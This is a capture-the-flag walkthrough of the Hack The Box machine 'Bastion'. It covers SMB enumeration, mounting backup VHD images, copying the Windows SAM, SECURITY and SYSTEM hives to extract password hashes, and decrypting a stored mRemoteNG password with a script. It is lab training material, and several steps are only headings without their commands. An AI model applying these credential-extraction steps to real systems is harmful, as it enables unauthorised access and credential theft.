Hackthebox - Bastion
Windows
Nmap
HTTP
While investing SMB we can launch a gobuster scan on the open http ports
gobuster dir -u http://10.10.10.134:47001/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
andgobuster dir -u http://10.10.10.134:5985/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
Nothing here (as the foothold seems to be done through smb really)
SMB
Looking at the nmap SMB seems worth investigating
Enum4linux
smbmap
smbclient
We finally are able to connect to a share this way:
Let's get the content. We can get everything in a row using this set of commands
We have to abort this the note says:
Big hint to investigate this backup folder
Let's just have a look around for now
Here is an article by Jake Binstein that is interesting to better understand the folder (Check out the Structure part in the end). That is a start.
We have an info about the name of the pc and a potential user
L4mpje-PC
Looking further in the files we find vhd images. Here is an article by Samuel Whang on how to mount this type of files
vhd file
Following Samuel Whang article, we first create a dir to mount the remote share
sudo mkdir /mnt/remote
Note: I am going to sudo su for the rest of the process
Let's create a mount point for the first vhd file
mkdir /mnt/vhd1
Let's now mount it with guestmount
guestmount --add /mnt/remote/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd1 -v
Let's do the same last step for the 2nd vhd file
mkdir /mnt/vhd2
guestmount --add /mnt/remote/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd2 -v
In my case it worked for the 2nd file only. I am going to inspect it and then trouble shot the 1st file in case (note: I realized later that one is a boot partition and the other the disk so that is why one of the image is useless for us)
Let's copy the SAM, Security and system files in my working directory
cp SAM SECURITY SYSTEM ../../../../../home/kali/Documents/hackthebox/bastion
Let's try the password on ssh
Also we can not that according to the admin hash we see that it is not stored as an lm hash (blank or null)
SSH
Privesc
Let's get winpeas in the target. Nothing really
PowerUp is more verbose. It seems to be dll hijack
I tried the techniques listed here, however with our current rights nothing works...
Let's go back to manual enum
In the programs this one is unusual mRemoteNG. We can have a look at the changelog to get the version that seems to be 1.76.11
After a google search we get this article. So this article turns used this same box as an example... it is a big spoil xD. But in a real context we would have looked in the configuration files anyway and google something like "decrypt mremoteng passwords" or something similar.
Indeed the file confCons.xml contains a password
We can follow step 3 of the article
python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
Last updated